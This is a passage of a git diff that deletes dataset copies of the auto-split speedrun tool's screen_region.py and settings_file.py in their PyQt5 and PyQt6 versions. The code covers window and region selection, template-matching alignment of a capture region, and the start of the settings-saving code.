-+    GetAncestor = cast(Callable[[int, int], int], ctypes.windll.user32.GetAncestor)
-     GA_ROOT = 2
-
-     while win32gui.IsChild(win32gui.GetParent(self.hwnd), self.hwnd):
-@@ -80,10 +81,9 @@ def selectWindow(self):
-         QtTest.QTest.qWait(1)
-
-     # Grab the window handle from the coordinates selected by the widget
--    self.hwnd = None
--    self.hwnd = win32gui.WindowFromPoint((selector.x, selector.y))
-+    self.hwnd = cast(int, win32gui.WindowFromPoint((selector.x, selector.y)))
-
--    if self.hwnd is None:
-+    if self.hwnd == 0:
-         return
-
-     del selector
-@@ -91,7 +91,7 @@
-     # Want to pull the parent window from the window handle
-     # By using GetAncestor we are able to get the parent window instead
-     # of the owner window.
--    GetAncestor = ctypes.windll.user32.GetAncestor
-+    GetAncestor = cast(Callable[[int, int], int], ctypes.windll.user32.GetAncestor)
-     GA_ROOT = 2
-     while win32gui.IsChild(win32gui.GetParent(self.hwnd), self.hwnd):
-         self.hwnd = GetAncestor(self.hwnd, GA_ROOT)
-@@ -124,8 +124,11 @@ def alignRegion(self):
-         return
-     # This is the image used for aligning the capture region
-     # to the best fit for the user.
--    template_filename = str(QtWidgets.QFileDialog.getOpenFileName(self, "Select Reference Image", "",
--        "Image Files (*.png *.jpg *.jpeg *.jpe *.jp2 *.bmp *.tiff *.tif *.dib *.webp *.pbm *.pgm *.ppm *.sr *.ras)"))
-+    template_filename = str(QtWidgets.QFileDialog.getOpenFileName(
-+        self,
-+        "Select Reference Image",
-+        "",
-+        "Image Files (*.png *.jpg *.jpeg *.jpe *.jp2 *.bmp *.tiff *.tif *.dib *.webp *.pbm *.pgm *.ppm *.sr *.ras)"))
-
-     # return if the user presses cancel
-     if template_filename == '':
-@@ -221,13 +224,13 @@ class SelectWindowWidget(QtWidgets.QWidget):
-         self.setWindowTitle(' ')
-
-         self.setWindowOpacity(0.5)
--        self.setWindowFlags(QtCore.Qt.FramelessWindowHint)
-+        self.setWindowFlags(QtCore.Qt.WindowType.FramelessWindowHint)
-         self.show()
-
--    def mouseReleaseEvent(self, event):
-+    def mouseReleaseEvent(self, event: QtGui.QMouseEvent):
-         self.close()
--        self.x = event.pos().x()
--        self.y = event.pos().y()
-+        self.x = int(event.position().x())
-+        self.y = int(event.position().y())
-
- # Widget for dragging screen region
- # https://github.com/harupy/snipping-tool
-@@ -254,36 +257,36 @@ class SelectRegionWidget(QtWidgets.QWidget):
-         self.begin = QtCore.QPoint()
-         self.end = QtCore.QPoint()
-         self.setWindowOpacity(0.5)
--        QtWidgets.QApplication.setOverrideCursor(QtGui.QCursor(QtCore.Qt.CrossCursor))
--        self.setWindowFlags(QtCore.Qt.FramelessWindowHint)
-+        QtWidgets.QApplication.setOverrideCursor(QtGui.QCursor(QtCore.Qt.CursorShape.CrossCursor))
-+        self.setWindowFlags(QtCore.Qt.WindowType.FramelessWindowHint)
-         self.show()
-
--    def paintEvent(self, event):
-+    def paintEvent(self, event: QtGui.QPaintEvent):
-         qp = QtGui.QPainter(self)
-         qp.setPen(QtGui.QPen(QtGui.QColor('red'), 2))
-         qp.setBrush(QtGui.QColor('opaque'))
-         qp.drawRect(QtCore.QRect(self.begin, self.end))
-
--    def mousePressEvent(self, event):
--        self.begin = event.pos()
-+    def mousePressEvent(self, event: QtGui.QMouseEvent):
-+        self.begin = event.position().toPoint()
-         self.end = self.begin
-         self.update()
-
--    def mouseMoveEvent(self, event):
--        self.end = event.pos()
-+    def mouseMoveEvent(self, event: QtGui.QMouseEvent):
-+        self.end = event.position().toPoint()
-         self.update()
-
--    def mouseReleaseEvent(self, event):
-+    def mouseReleaseEvent(self, event: QtGui.QMouseEvent):
--        QtWidgets.QApplication.setOverrideCursor(QtGui.QCursor(QtCore.Qt.ArrowCursor))
-+        QtWidgets.QApplication.setOverrideCursor(QtGui.QCursor(QtCore.Qt.CursorShape.ArrowCursor))
-         self.close()
-
-         # The coordinates are pulled relative to the top left of the set geometry,
-         # so the added virtual screen offsets convert them back to the virtual
-         # screen coordinates
--        self.left = min(self.begin.x(), self.end.x()) + self.SM_XVIRTUALSCREEN
--        self.top = min(self.begin.y(), self.end.y()) + self.SM_YVIRTUALSCREEN
--        self.right = max(self.begin.x(), self.end.x()) + self.SM_XVIRTUALSCREEN
--        self.bottom = max(self.begin.y(), self.end.y()) + self.SM_YVIRTUALSCREEN
-+        self.left = int(min(self.begin.x(), self.end.x()) + self.SM_XVIRTUALSCREEN)
-+        self.top = int(min(self.begin.y(), self.end.y()) + self.SM_YVIRTUALSCREEN)
-+        self.right = int(max(self.begin.x(), self.end.x()) + self.SM_XVIRTUALSCREEN)
-+        self.bottom = int(max(self.begin.y(), self.end.y()) + self.SM_YVIRTUALSCREEN)
-
-         self.height = self.bottom - self.top
-         self.width = self.right - self.left
diff --git a/v1/data/codefile/toufool@auto-split__86244b6__src$screen_region.py.source.py b/v1/data/codefile/toufool@auto-split__86244b6__src$screen_region.py.source.py
deleted file mode 100644
index c694799..0000000
--- a/v1/data/codefile/toufool@auto-split__86244b6__src$screen_region.py.source.py
+++ /dev/null
@@ -1,289 +0,0 @@
-from PyQt5 import QtCore, QtGui, QtTest, QtWidgets
-from win32 import win32gui
-import capture_windows
-import ctypes
-import ctypes.wintypes
-import cv2
-import numpy as np
-
-def selectRegion(self):
-    # Create a screen selector widget
-    selector = SelectRegionWidget()
-
-    # Need to wait until the user has selected a region using the widget before moving on with
-    # selecting the window settings
-    while selector.height == -1 and selector.width == -1:
-        QtTest.QTest.qWait(1)
-
-    # return an error if width or height are zero.
-    if selector.width == 0 or selector.height == 0:
-        self.regionSizeError()
-        return
-
-    # Width and Height of the spinBox
-    self.widthSpinBox.setValue(selector.width)
-    self.heightSpinBox.setValue(selector.height)
-
-    # Grab the window handle from the coordinates selected by the widget
-    self.hwnd = win32gui.WindowFromPoint((selector.left, selector.top))
-    # Want to pull the parent window from the window handle
-    # By using GetAncestor we are able to get the parent window instead
-    # of the owner window.
-    GetAncestor = ctypes.windll.user32.GetAncestor
-    GA_ROOT = 2
-
-    while win32gui.IsChild(win32gui.GetParent(self.hwnd), self.hwnd):
-        self.hwnd = GetAncestor(self.hwnd, GA_ROOT)
-
-    if self.hwnd != 0 or win32gui.GetWindowText(self.hwnd) != '':
-        self.hwnd_title = win32gui.GetWindowText(self.hwnd)
-
-    # Convert the Desktop Coordinates to Window Coordinates
-    DwmGetWindowAttribute = ctypes.windll.dwmapi.DwmGetWindowAttribute
-    DWMWA_EXTENDED_FRAME_BOUNDS = 9
-
-    # Pull the window's coordinates relative to desktop into rect
-    DwmGetWindowAttribute(self.hwnd,
-                          ctypes.wintypes.DWORD(DWMWA_EXTENDED_FRAME_BOUNDS),
-                          ctypes.byref(self.rect),
-                          ctypes.sizeof(self.rect)
-                          )
-
-    # On Windows 10 the windows have offsets due to invisible pixels not accounted for in DwmGetWindowAttribute
-    # TODO: Since this occurs on Windows 10, is DwmGetWindowAttribute even required over GetWindowRect alone?
-    # Research needs to be done to figure out why it was used over win32gui in the first place...
-    # I have a feeling it was due to a misunderstanding and not getting the correct parent window before.
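-    # Illustration of these offsets (hypothetical numbers, not from this project):
-    # GetWindowRect includes the invisible grip border that Windows 10 draws
-    # around most windows, while the extended frame bounds above exclude it, so
-    # at 96 DPI offset_left typically works out to a small constant such as 7.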
-    offset_left = self.rect.left - win32gui.GetWindowRect(self.hwnd)[0]
-    offset_top = self.rect.top - win32gui.GetWindowRect(self.hwnd)[1]
-
-    self.rect.left = selector.left - (self.rect.left - offset_left)
-    self.rect.top = selector.top - (self.rect.top - offset_top)
-    self.rect.right = self.rect.left + selector.width
-    self.rect.bottom = self.rect.top + selector.height
-
-    self.xSpinBox.setValue(self.rect.left)
-    self.ySpinBox.setValue(self.rect.top)
-
-    # Delete that widget since it is no longer used from here on out
-    del selector
-
-    # check if live image needs to be turned on or just set a single image
-    self.checkLiveImage()
-
-def selectWindow(self):
-    # Create a screen selector widget
-    selector = SelectWindowWidget()
-
-    # Need to wait until the user has selected a region using the widget before moving on with
-    # selecting the window settings
-    while selector.x == -1 and selector.y == -1:
-        QtTest.QTest.qWait(1)
-
-    # Grab the window handle from the coordinates selected by the widget
-    self.hwnd = None
-    self.hwnd = win32gui.WindowFromPoint((selector.x, selector.y))
-
-    if self.hwnd is None:
-        return
-
-    del selector
-
-    # Want to pull the parent window from the window handle
-    # By using GetAncestor we are able to get the parent window instead
-    # of the owner window.
-    GetAncestor = ctypes.windll.user32.GetAncestor
-    GA_ROOT = 2
-    while win32gui.IsChild(win32gui.GetParent(self.hwnd), self.hwnd):
-        self.hwnd = GetAncestor(self.hwnd, GA_ROOT)
-
-    if self.hwnd != 0 or win32gui.GetWindowText(self.hwnd) != '':
-        self.hwnd_title = win32gui.GetWindowText(self.hwnd)
-
-    # getting window bounds
-    # on windows there are some invisible pixels that are not accounted for
-    # also the top bar with the window name is not accounted for
-    # I hardcoded the x and y coordinates to fix this
-    # This is not an ideal solution because it assumes every window will have a top bar
-    rect = win32gui.GetClientRect(self.hwnd)
-    self.rect.left = 8
-    self.rect.top = 31
-    self.rect.right = 0 + rect[2]
-    self.rect.bottom = 0 + rect[3]
-
-    self.widthSpinBox.setValue(self.rect.right)
-    self.heightSpinBox.setValue(self.rect.bottom)
-    self.xSpinBox.setValue(self.rect.left)
-    self.ySpinBox.setValue(self.rect.top)
-
-    self.checkLiveImage()
-
-def alignRegion(self):
-    # check to see if a region has been set
-    if self.hwnd == 0 or win32gui.GetWindowText(self.hwnd) == '':
-        self.regionError()
-        return
-    # This is the image used for aligning the capture region
-    # to the best fit for the user.
-    template_filename = str(QtWidgets.QFileDialog.getOpenFileName(self, "Select Reference Image", "",
-        "Image Files (*.png *.jpg *.jpeg *.jpe *.jp2 *.bmp *.tiff *.tif *.dib *.webp *.pbm *.pgm *.ppm *.sr *.ras)"))
-
-    # return if the user presses cancel
-    if template_filename == '':
-        return
-
-    template = cv2.imread(template_filename, cv2.IMREAD_COLOR)
-
-    # shouldn't need this, but just for caution, throw a type error if file is not a valid image file
-    if template is None:
-        self.alignRegionImageTypeError()
-        return
-
-    # Obtaining the capture of a region which contains the
-    # subregion being searched for to align the image.
-    capture = capture_windows.capture_region(self.hwnd, self.rect)
-    capture = cv2.cvtColor(capture, cv2.COLOR_BGRA2BGR)
-
-    # Obtain the best matching point for the template within the
-    # capture. This assumes that the template is actually smaller
-    # than the dimensions of the capture. Since we are using SQDIFF
-    # the best match will be the min_val which is located at min_loc.
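-    # (For context: with cv2.TM_SQDIFF every cell of the result matrix is the
-    # sum of squared pixel differences for that placement of the template, so
-    # 0 is a pixel-perfect match and larger values are worse matches.)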
-    # The best match found in the image, set everything to 0 by default
-    # so that way the first match will overwrite these values
-    best_match = 0.0
-    best_height = 0
-    best_width = 0
-    best_loc = (0, 0)
-
-    # This tests up to 56 images scaled from 20% to 300% of the original template size
-    for scale in np.linspace(0.2, 3, num=56):
-        width = int(template.shape[1] * scale)
-        height = int(template.shape[0] * scale)
-
-        # The template can not be larger than the capture
-        if width > capture.shape[1] or height > capture.shape[0]:
-            continue
-
-        resized = cv2.resize(template, (width, height))
-
-        result = cv2.matchTemplate(capture, resized, cv2.TM_SQDIFF)
-        min_val, max_val, min_loc, max_loc = cv2.minMaxLoc(result)
-
-        # The maximum value for SQ_DIFF is dependent on the size of the template
-        # we need this value to normalize it from 0.0 to 1.0
-        max_error = resized.size * 255 * 255
-        similarity = 1 - (min_val / max_error)
-
-        # Check if the similarity was good enough to get alignment
-        if similarity > best_match:
-            best_match = similarity
-            best_width = width
-            best_height = height
-            best_loc = min_loc
-
-    # Go ahead and check if this satisfies our requirement before setting the region
-    # We don't want a low similarity image to be aligned.
-    if best_match < 0.9:
-        self.alignmentNotMatchedError()
-        return
-
-    # The new region can be defined by using the min_loc point and the
-    # height and width of the template.
-    self.rect.left = self.rect.left + best_loc[0]
-    self.rect.top = self.rect.top + best_loc[1]
-    self.rect.right = self.rect.left + best_width
-    self.rect.bottom = self.rect.top + best_height
-
-    self.xSpinBox.setValue(self.rect.left)
-    self.ySpinBox.setValue(self.rect.top)
-    self.widthSpinBox.setValue(best_width)
-    self.heightSpinBox.setValue(best_height)
-
-
-# widget to select a window and obtain its bounds
-class SelectWindowWidget(QtWidgets.QWidget):
-    def __init__(self):
-        super(SelectWindowWidget, self).__init__()
-        user32 = ctypes.windll.user32
-        user32.SetProcessDPIAware()
-
-        self.x = -1
-        self.y = -1
-
-        # We need to pull the monitor information to correctly draw the geometry covering all portions
-        # of the user's screen. These parameters create the bounding box with left, top, width, and height
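-        # (The magic indices below are the standard winuser.h system metrics:
-        # 76 = SM_XVIRTUALSCREEN, 77 = SM_YVIRTUALSCREEN,
-        # 78 = SM_CXVIRTUALSCREEN, 79 = SM_CYVIRTUALSCREEN.)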
-        self.SM_XVIRTUALSCREEN = user32.GetSystemMetrics(76)
-        self.SM_YVIRTUALSCREEN = user32.GetSystemMetrics(77)
-        self.SM_CXVIRTUALSCREEN = user32.GetSystemMetrics(78)
-        self.SM_CYVIRTUALSCREEN = user32.GetSystemMetrics(79)
-
-        self.setGeometry(self.SM_XVIRTUALSCREEN, self.SM_YVIRTUALSCREEN, self.SM_CXVIRTUALSCREEN,
-                         self.SM_CYVIRTUALSCREEN)
-        self.setWindowTitle(' ')
-
-        self.setWindowOpacity(0.5)
-        self.setWindowFlags(QtCore.Qt.FramelessWindowHint)
-        self.show()
-
-    def mouseReleaseEvent(self, event):
-        self.close()
-        self.x = event.pos().x()
-        self.y = event.pos().y()
-
-# Widget for dragging screen region
-# https://github.com/harupy/snipping-tool
-class SelectRegionWidget(QtWidgets.QWidget):
-    def __init__(self):
-        super(SelectRegionWidget, self).__init__()
-        user32 = ctypes.windll.user32
-        user32.SetProcessDPIAware()
-
-        # We need to pull the monitor information to correctly draw the geometry covering all portions
-        # of the user's screen. These parameters create the bounding box with left, top, width, and height
-        self.SM_XVIRTUALSCREEN = user32.GetSystemMetrics(76)
-        self.SM_YVIRTUALSCREEN = user32.GetSystemMetrics(77)
-        self.SM_CXVIRTUALSCREEN = user32.GetSystemMetrics(78)
-        self.SM_CYVIRTUALSCREEN = user32.GetSystemMetrics(79)
-
-        self.setGeometry(self.SM_XVIRTUALSCREEN, self.SM_YVIRTUALSCREEN, self.SM_CXVIRTUALSCREEN,
-                         self.SM_CYVIRTUALSCREEN)
-        self.setWindowTitle(' ')
-
-        self.height = -1
-        self.width = -1
-
-        self.begin = QtCore.QPoint()
-        self.end = QtCore.QPoint()
-        self.setWindowOpacity(0.5)
-        QtWidgets.QApplication.setOverrideCursor(QtGui.QCursor(QtCore.Qt.CrossCursor))
-        self.setWindowFlags(QtCore.Qt.FramelessWindowHint)
-        self.show()
-
-    def paintEvent(self, event):
-        qp = QtGui.QPainter(self)
-        qp.setPen(QtGui.QPen(QtGui.QColor('red'), 2))
-        qp.setBrush(QtGui.QColor('opaque'))
-        qp.drawRect(QtCore.QRect(self.begin, self.end))
-
-    def mousePressEvent(self, event):
-        self.begin = event.pos()
-        self.end = self.begin
-        self.update()
-
-    def mouseMoveEvent(self, event):
-        self.end = event.pos()
-        self.update()
-
-    def mouseReleaseEvent(self, event):
-        QtWidgets.QApplication.setOverrideCursor(QtGui.QCursor(QtCore.Qt.ArrowCursor))
-        self.close()
-
-        # The coordinates are pulled relative to the top left of the set geometry,
-        # so the added virtual screen offsets convert them back to the virtual
-        # screen coordinates
-        self.left = min(self.begin.x(), self.end.x()) + self.SM_XVIRTUALSCREEN
-        self.top = min(self.begin.y(), self.end.y()) + self.SM_YVIRTUALSCREEN
-        self.right = max(self.begin.x(), self.end.x()) + self.SM_XVIRTUALSCREEN
-        self.bottom = max(self.begin.y(), self.end.y()) + self.SM_YVIRTUALSCREEN
-
-        self.height = self.bottom - self.top
-        self.width = self.right - self.left
diff --git a/v1/data/codefile/toufool@auto-split__86244b6__src$screen_region.py.target.py b/v1/data/codefile/toufool@auto-split__86244b6__src$screen_region.py.target.py
deleted file mode 100644
index a4606fc..0000000
--- a/v1/data/codefile/toufool@auto-split__86244b6__src$screen_region.py.target.py
+++ /dev/null
@@ -1,292 +0,0 @@
-from PyQt6 import QtCore, QtGui, QtTest, QtWidgets
-from win32 import win32gui
-from typing import cast, Callable
-import capture_windows
-import ctypes
-import ctypes.wintypes
-import cv2
-import numpy as np
-
-def selectRegion(self):
-    # Create a screen selector widget
-    selector = SelectRegionWidget()
-
-    # Need to wait until the user has selected a region using the widget before moving on with
-    # selecting the window settings
-    while selector.height == -1 and selector.width == -1:
-        QtTest.QTest.qWait(1)
-
-    # return an error if width or height are zero.
-    if selector.width == 0 or selector.height == 0:
-        self.regionSizeError()
-        return
-
-    # Width and Height of the spinBox
-    self.widthSpinBox.setValue(selector.width)
-    self.heightSpinBox.setValue(selector.height)
-
-    # Grab the window handle from the coordinates selected by the widget
-    self.hwnd = cast(int, win32gui.WindowFromPoint((selector.left, selector.top)))
-    # Want to pull the parent window from the window handle
-    # By using GetAncestor we are able to get the parent window instead
-    # of the owner window.
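-    # (GA_ROOT is the GetAncestor flag from winuser.h, where GA_PARENT = 1,
-    # GA_ROOT = 2 and GA_ROOTOWNER = 3; 2 walks the handle up to its
-    # top-level window.)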
-    GetAncestor = cast(Callable[[int, int], int], ctypes.windll.user32.GetAncestor)
-    GA_ROOT = 2
-
-    while win32gui.IsChild(win32gui.GetParent(self.hwnd), self.hwnd):
-        self.hwnd = GetAncestor(self.hwnd, GA_ROOT)
-
-    if self.hwnd != 0 or win32gui.GetWindowText(self.hwnd) != '':
-        self.hwnd_title = win32gui.GetWindowText(self.hwnd)
-
-    # Convert the Desktop Coordinates to Window Coordinates
-    DwmGetWindowAttribute = ctypes.windll.dwmapi.DwmGetWindowAttribute
-    DWMWA_EXTENDED_FRAME_BOUNDS = 9
-
-    # Pull the window's coordinates relative to desktop into rect
-    DwmGetWindowAttribute(self.hwnd,
-                          ctypes.wintypes.DWORD(DWMWA_EXTENDED_FRAME_BOUNDS),
-                          ctypes.byref(self.rect),
-                          ctypes.sizeof(self.rect)
-                          )
-
-    # On Windows 10 the windows have offsets due to invisible pixels not accounted for in DwmGetWindowAttribute
-    # TODO: Since this occurs on Windows 10, is DwmGetWindowAttribute even required over GetWindowRect alone?
-    # Research needs to be done to figure out why it was used over win32gui in the first place...
-    # I have a feeling it was due to a misunderstanding and not getting the correct parent window before.
-    offset_left = self.rect.left - win32gui.GetWindowRect(self.hwnd)[0]
-    offset_top = self.rect.top - win32gui.GetWindowRect(self.hwnd)[1]
-
-    self.rect.left = selector.left - (self.rect.left - offset_left)
-    self.rect.top = selector.top - (self.rect.top - offset_top)
-    self.rect.right = self.rect.left + selector.width
-    self.rect.bottom = self.rect.top + selector.height
-
-    self.xSpinBox.setValue(self.rect.left)
-    self.ySpinBox.setValue(self.rect.top)
-
-    # Delete that widget since it is no longer used from here on out
-    del selector
-
-    # check if live image needs to be turned on or just set a single image
-    self.checkLiveImage()
-
-def selectWindow(self):
-    # Create a screen selector widget
-    selector = SelectWindowWidget()
-
-    # Need to wait until the user has selected a region using the widget before moving on with
-    # selecting the window settings
-    while selector.x == -1 and selector.y == -1:
-        QtTest.QTest.qWait(1)
-
-    # Grab the window handle from the coordinates selected by the widget
-    self.hwnd = cast(int, win32gui.WindowFromPoint((selector.x, selector.y)))
-
-    if self.hwnd == 0:
-        return
-
-    del selector
-
-    # Want to pull the parent window from the window handle
-    # By using GetAncestor we are able to get the parent window instead
-    # of the owner window.
-    GetAncestor = cast(Callable[[int, int], int], ctypes.windll.user32.GetAncestor)
-    GA_ROOT = 2
-    while win32gui.IsChild(win32gui.GetParent(self.hwnd), self.hwnd):
-        self.hwnd = GetAncestor(self.hwnd, GA_ROOT)
-
-    if self.hwnd != 0 or win32gui.GetWindowText(self.hwnd) != '':
-        self.hwnd_title = win32gui.GetWindowText(self.hwnd)
-
-    # getting window bounds
-    # on windows there are some invisible pixels that are not accounted for
-    # also the top bar with the window name is not accounted for
-    # I hardcoded the x and y coordinates to fix this
-    # This is not an ideal solution because it assumes every window will have a top bar
-    rect = win32gui.GetClientRect(self.hwnd)
-    self.rect.left = 8
-    self.rect.top = 31
-    self.rect.right = 0 + rect[2]
-    self.rect.bottom = 0 + rect[3]
-
-    self.widthSpinBox.setValue(self.rect.right)
-    self.heightSpinBox.setValue(self.rect.bottom)
-    self.xSpinBox.setValue(self.rect.left)
-    self.ySpinBox.setValue(self.rect.top)
-
-    self.checkLiveImage()
-
-def alignRegion(self):
-    # check to see if a region has been set
-    if self.hwnd == 0 or win32gui.GetWindowText(self.hwnd) == '':
-        self.regionError()
-        return
-    # This is the image used for aligning the capture region
-    # to the best fit for the user.
-    template_filename = str(QtWidgets.QFileDialog.getOpenFileName(
-        self,
-        "Select Reference Image",
-        "",
-        "Image Files (*.png *.jpg *.jpeg *.jpe *.jp2 *.bmp *.tiff *.tif *.dib *.webp *.pbm *.pgm *.ppm *.sr *.ras)"))
-
-    # return if the user presses cancel
-    if template_filename == '':
-        return
-
-    template = cv2.imread(template_filename, cv2.IMREAD_COLOR)
-
-    # shouldn't need this, but just for caution, throw a type error if file is not a valid image file
-    if template is None:
-        self.alignRegionImageTypeError()
-        return
-
-    # Obtaining the capture of a region which contains the
-    # subregion being searched for to align the image.
-    capture = capture_windows.capture_region(self.hwnd, self.rect)
-    capture = cv2.cvtColor(capture, cv2.COLOR_BGRA2BGR)
-
-    # Obtain the best matching point for the template within the
-    # capture. This assumes that the template is actually smaller
-    # than the dimensions of the capture. Since we are using SQDIFF
-    # the best match will be the min_val which is located at min_loc.
-    # The best match found in the image, set everything to 0 by default
-    # so that way the first match will overwrite these values
-    best_match = 0.0
-    best_height = 0
-    best_width = 0
-    best_loc = (0, 0)
-
-    # This tests up to 56 images scaled from 20% to 300% of the original template size
-    for scale in np.linspace(0.2, 3, num=56):
-        width = int(template.shape[1] * scale)
-        height = int(template.shape[0] * scale)
-
-        # The template can not be larger than the capture
-        if width > capture.shape[1] or height > capture.shape[0]:
-            continue
-
-        resized = cv2.resize(template, (width, height))
-
-        result = cv2.matchTemplate(capture, resized, cv2.TM_SQDIFF)
-        min_val, max_val, min_loc, max_loc = cv2.minMaxLoc(result)
-
-        # The maximum value for SQ_DIFF is dependent on the size of the template
-        # we need this value to normalize it from 0.0 to 1.0
-        max_error = resized.size * 255 * 255
-        similarity = 1 - (min_val / max_error)
-
-        # Check if the similarity was good enough to get alignment
-        if similarity > best_match:
-            best_match = similarity
-            best_width = width
-            best_height = height
-            best_loc = min_loc
-
-    # Go ahead and check if this satisfies our requirement before setting the region
-    # We don't want a low similarity image to be aligned.
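-    # Worked example with a hypothetical template (not from this project): a
-    # 100x50 BGR template gives resized.size = 100 * 50 * 3 = 15000 values and
-    # max_error = 15000 * 255 * 255 = 975,375,000, so the 0.9 threshold below
-    # accepts a placement only when min_val stays within 10% of that worst case.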
-    if best_match < 0.9:
-        self.alignmentNotMatchedError()
-        return
-
-    # The new region can be defined by using the min_loc point and the
-    # height and width of the template.
-    self.rect.left = self.rect.left + best_loc[0]
-    self.rect.top = self.rect.top + best_loc[1]
-    self.rect.right = self.rect.left + best_width
-    self.rect.bottom = self.rect.top + best_height
-
-    self.xSpinBox.setValue(self.rect.left)
-    self.ySpinBox.setValue(self.rect.top)
-    self.widthSpinBox.setValue(best_width)
-    self.heightSpinBox.setValue(best_height)
-
-
-# widget to select a window and obtain its bounds
-class SelectWindowWidget(QtWidgets.QWidget):
-    def __init__(self):
-        super(SelectWindowWidget, self).__init__()
-        user32 = ctypes.windll.user32
-        user32.SetProcessDPIAware()
-
-        self.x = -1
-        self.y = -1
-
-        # We need to pull the monitor information to correctly draw the geometry covering all portions
-        # of the user's screen. These parameters create the bounding box with left, top, width, and height
-        self.SM_XVIRTUALSCREEN = user32.GetSystemMetrics(76)
-        self.SM_YVIRTUALSCREEN = user32.GetSystemMetrics(77)
-        self.SM_CXVIRTUALSCREEN = user32.GetSystemMetrics(78)
-        self.SM_CYVIRTUALSCREEN = user32.GetSystemMetrics(79)
-
-        self.setGeometry(self.SM_XVIRTUALSCREEN, self.SM_YVIRTUALSCREEN, self.SM_CXVIRTUALSCREEN,
-                         self.SM_CYVIRTUALSCREEN)
-        self.setWindowTitle(' ')
-
-        self.setWindowOpacity(0.5)
-        self.setWindowFlags(QtCore.Qt.WindowType.FramelessWindowHint)
-        self.show()
-
-    def mouseReleaseEvent(self, event: QtGui.QMouseEvent):
-        self.close()
-        self.x = int(event.position().x())
-        self.y = int(event.position().y())
-
-# Widget for dragging screen region
-# https://github.com/harupy/snipping-tool
-class SelectRegionWidget(QtWidgets.QWidget):
-    def __init__(self):
-        super(SelectRegionWidget, self).__init__()
-        user32 = ctypes.windll.user32
-        user32.SetProcessDPIAware()
-
-        # We need to pull the monitor information to correctly draw the geometry covering all portions
-        # of the user's screen. These parameters create the bounding box with left, top, width, and height
-        self.SM_XVIRTUALSCREEN = user32.GetSystemMetrics(76)
-        self.SM_YVIRTUALSCREEN = user32.GetSystemMetrics(77)
-        self.SM_CXVIRTUALSCREEN = user32.GetSystemMetrics(78)
-        self.SM_CYVIRTUALSCREEN = user32.GetSystemMetrics(79)
-
-        self.setGeometry(self.SM_XVIRTUALSCREEN, self.SM_YVIRTUALSCREEN, self.SM_CXVIRTUALSCREEN,
-                         self.SM_CYVIRTUALSCREEN)
-        self.setWindowTitle(' ')
-
-        self.height = -1
-        self.width = -1
-
-        self.begin = QtCore.QPoint()
-        self.end = QtCore.QPoint()
-        self.setWindowOpacity(0.5)
-        QtWidgets.QApplication.setOverrideCursor(QtGui.QCursor(QtCore.Qt.CursorShape.CrossCursor))
-        self.setWindowFlags(QtCore.Qt.WindowType.FramelessWindowHint)
-        self.show()
-
-    def paintEvent(self, event: QtGui.QPaintEvent):
-        qp = QtGui.QPainter(self)
-        qp.setPen(QtGui.QPen(QtGui.QColor('red'), 2))
-        qp.setBrush(QtGui.QColor('opaque'))
-        qp.drawRect(QtCore.QRect(self.begin, self.end))
-
-    def mousePressEvent(self, event: QtGui.QMouseEvent):
-        self.begin = event.position().toPoint()
-        self.end = self.begin
-        self.update()
-
-    def mouseMoveEvent(self, event: QtGui.QMouseEvent):
-        self.end = event.position().toPoint()
-        self.update()
-
-    def mouseReleaseEvent(self, event: QtGui.QMouseEvent):
-        QtWidgets.QApplication.setOverrideCursor(QtGui.QCursor(QtCore.Qt.CursorShape.ArrowCursor))
-        self.close()
-
-        # The coordinates are pulled relative to the top left of the set geometry,
-        # so the added virtual screen offsets convert them back to the virtual
-        # screen coordinates
-        self.left = int(min(self.begin.x(), self.end.x()) + self.SM_XVIRTUALSCREEN)
-        self.top = int(min(self.begin.y(), self.end.y()) + self.SM_YVIRTUALSCREEN)
-        self.right = int(max(self.begin.x(), self.end.x()) + self.SM_XVIRTUALSCREEN)
-        self.bottom = int(max(self.begin.y(), self.end.y()) + self.SM_YVIRTUALSCREEN)
-
-        self.height = self.bottom - self.top
-        self.width = self.right - self.left
diff --git a/v1/data/codefile/toufool@auto-split__86244b6__src$settings_file.py.diff b/v1/data/codefile/toufool@auto-split__86244b6__src$settings_file.py.diff
deleted file mode 100644
index 773c113..0000000
--- a/v1/data/codefile/toufool@auto-split__86244b6__src$settings_file.py.diff
+++ /dev/null
@@ -1,11 +0,0 @@
-diff --git a/src/settings_file.py b/src/settings_file.py
- index a43c20e4d2b01d4642956e22c666eb23b7e25471..86244b6c190f48200826788fa6af4bd8d26b230f 100644
- --- a/src/settings_file.py
- +++ b/src/settings_file.py
-@@ -1,5 +1,5 @@
- from win32 import win32gui
--from PyQt5 import QtWidgets
-+from PyQt6 import QtWidgets
- import keyboard
- import pickle
- import glob
diff --git a/v1/data/codefile/toufool@auto-split__86244b6__src$settings_file.py.source.py b/v1/data/codefile/toufool@auto-split__86244b6__src$settings_file.py.source.py
deleted file mode 100644
index 4f43249..0000000
--- a/v1/data/codefile/toufool@auto-split__86244b6__src$settings_file.py.source.py
+++ /dev/null
@@ -1,267 +0,0 @@
-from win32 import win32gui
-from PyQt5 import QtWidgets
-import keyboard
-import pickle
-import glob
-
-
-def getSaveSettingsValues(self):
-    # get values to be able to save settings
-    self.x = self.xSpinBox.value()
-    self.y = self.ySpinBox.value()
-    self.width = self.widthSpinBox.value()
-    self.height = self.heightSpinBox.value()
-    self.split_image_directory = str(self.splitimagefolderLineEdit.text())
-    self.similarity_threshold = self.similaritythresholdDoubleSpinBox.value()
-    self.comparison_index = self.comparisonmethodComboBox.currentIndex()
-    self.pause = self.pauseDoubleSpinBox.value()
-    self.fps_limit = self.fpslimitSpinBox.value()
-    self.split_key = str(self.splitLineEdit.text())
-    self.reset_key = str(self.resetLineEdit.text())
-    self.skip_split_key = str(self.skipsplitLineEdit.text())
-    self.undo_split_key = str(self.undosplitLineEdit.text())
-    self.pause_key = str(self.pausehotkeyLineEdit.text())
-
-    if self.custompausetimesCheckBox.isChecked():
-        self.custom_pause_times_setting = 1
-    else:
-        self.custom_pause_times_setting = 0
-
-    if self.customthresholdsCheckBox.isChecked():
-        self.custom_thresholds_setting = 1
-    else:
-        self.custom_thresholds_setting = 0
-
-    if self.groupDummySplitsCheckBox.isChecked():
-        self.group_dummy_splits_undo_skip_setting = 1
-    else:
-        self.group_dummy_splits_undo_skip_setting = 0
-
-    if self.loopCheckBox.isChecked():
-        self.loop_setting = 1
-    else:
-        self.loop_setting = 0
-
-    if self.autostartonresetCheckBox.isChecked():
-        self.auto_start_on_reset_setting = 1
-    else:
-        self.auto_start_on_reset_setting = 0
-
-def haveSettingsChanged(self):
-    self.getSaveSettingsValues()
-    self.current_save_settings = [self.split_image_directory, self.similarity_threshold, self.comparison_index, self.pause,
-                                  self.fps_limit, self.split_key,
